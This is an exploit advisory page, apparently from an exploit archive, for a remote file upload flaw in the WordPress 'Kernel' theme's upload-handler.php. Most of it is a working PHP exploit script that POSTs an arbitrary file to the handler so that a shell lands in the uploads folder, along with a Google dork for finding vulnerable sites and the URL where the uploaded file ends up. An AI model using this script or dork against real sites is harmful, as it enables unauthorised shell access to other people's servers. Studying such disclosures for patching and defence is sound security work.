WordPress Theme Kernel Shell Upload

2013.11.09
Credit: iskorpitx
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

################################################################################################### # Exploit Title: WordPress themekernel-theme Themes Remote File Upload Vulnerability # Author: iskorpitx # Date: 6/11/2013 # Vendor Homepage: http://www.wikmag.com/ # Themes Link: http://themeforest.net/item/kernel-premium-wordpress-blog-magazine-theme-/857077 # Infected File: upload-handler.php # Category: webapps # Google dork: inurl:/wp-content/themes/kernel-theme/ # Tested on : Windows/Linux ################################################################################################### # Exploit <?php $uploadfile="upload.php"; $ch = curl_init("http://127.0.0.1/wp-content/themes/kernel-theme/functions/upload-handler.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('orange_themes'=>"@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> http://127.0.0.1/wordpress/wp-content/uploads/2013/11/upload.php All http://www.mavi1.org members


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top